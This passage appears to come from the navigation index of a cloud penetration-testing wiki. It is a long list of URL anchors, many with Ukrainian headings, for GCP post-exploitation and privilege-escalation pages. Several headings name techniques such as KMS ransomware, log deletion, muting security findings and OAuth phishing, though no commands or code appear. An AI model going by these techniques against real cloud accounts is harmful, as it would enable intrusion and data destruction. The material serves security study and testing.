,"pentesting-cloud/gcp-security/gcp-basic-information/index.html#Облікові-записи-служби","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Ключі-та-Токени","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Обсяги-доступу","pentesting-cloud/gcp-security/gcp-basic-information/index.html#terraform-iam-policies-bindings-and-memberships","pentesting-cloud/gcp-security/gcp-basic-information/index.html#references","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp---Зловживання-федерацією","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#oidc---Зловживання-github-actions","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---Дозволи-для-пентесту","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#Дозволи-індивідуальних-інструментів","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#Картографія","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---Постексплуатація","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#Читати-вихідний-код","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#Модифікувати-вихідний-код","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---Постексплуатація-реєстру-артефактів","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#Реєстр-артефактів","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#Привілеї","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---cloud-build-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---Постексплуатація-cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#Вкрасти-запити-до-cloud-function","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#Доступ-до-зображень","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#Змінити-та-повторно-розгорнути-зображення","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#container-escape","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#Використовуйте-його-як-проксі","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Експорт-та-перевірка-зображень-локально","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Експорт-та-перевірка-знімків-і-дисків-локально","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Інспекція-зображення-створюючи-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Інспекція-знімкадиска-приєднуючи-його-до-ВМ","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#mount-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Видалити-обмеження-та-отримати-додаткові-дозволи","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Відновлення-резервної-копії","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Створіть-резервну-копію-та-відновіть-її","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-Постексплуатація","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#Надання-доступу-до-консолі-управління","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-Постексплуатація","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---Логування-після-експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#За-замовчуванням-логування","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Додати-виключений-принципал","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Читати-логи---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Записати-журнали---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---Моніторинг-Після-Експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#Моніторинг","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-Постексплуатація","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---Безпека-після-експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#Безпека","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---Робочі-процеси-після-експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#Робочий-процес","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#Після-експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---Зберігання-Після-Експлуатації","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#Хмарне-Зберігання","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#Надати-Публічний-Доступ","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---Привілейоване-підвищення","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Вступ-до-привілейованого-підвищення-в-gcp","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Дозволи-для-методології-привілейованого-підвищення","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Обхід-доступу-до-обсягів","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Техніки-ескалації-привілеїв","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Зловживання-gcp-для-ескалації-привілеїв-локально","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Посилання","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#brute-force-api-key-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#Створіть-внутрішній-oauth-додаток-для-фішингу-інших-працівників","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Оновлення-еквівалентних-дозволів","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Доступ-на-запис-до-бакетів","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Доступ-на-запис-до-Реєстру-артефактів","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---Привілейоване-підвищення-в-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Читання-таблиці","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Експорт-даних","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Вставка-даних","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#Створення-oauth-Бренду-та-Клієнта","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Доступ-на-читання-та-запис-до-бакету","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Доступ-на-читання-та-запис-до-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Посилання","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#Додайте-себе-до-групи","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#Змінити-членство-в-групі","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#Посилання","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Обхід-доступу-до-обсягів","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Локальне-підвищення-привілеїв-у-gcp-compute-інстансі","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Посилання","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---Додати-користувацькі-ssh-метадані","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---Додати-користувацькі-ssh-метадані-1","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#Модифікація-метаданих","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#Посилання","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Завантажити-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Імпорт-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Доступ-на-запис-до-кошика-composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Імпорт-плагінів","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Імпорт-даних","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#контейнер","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---deploymentmaneger-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignblob","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignjwt","pen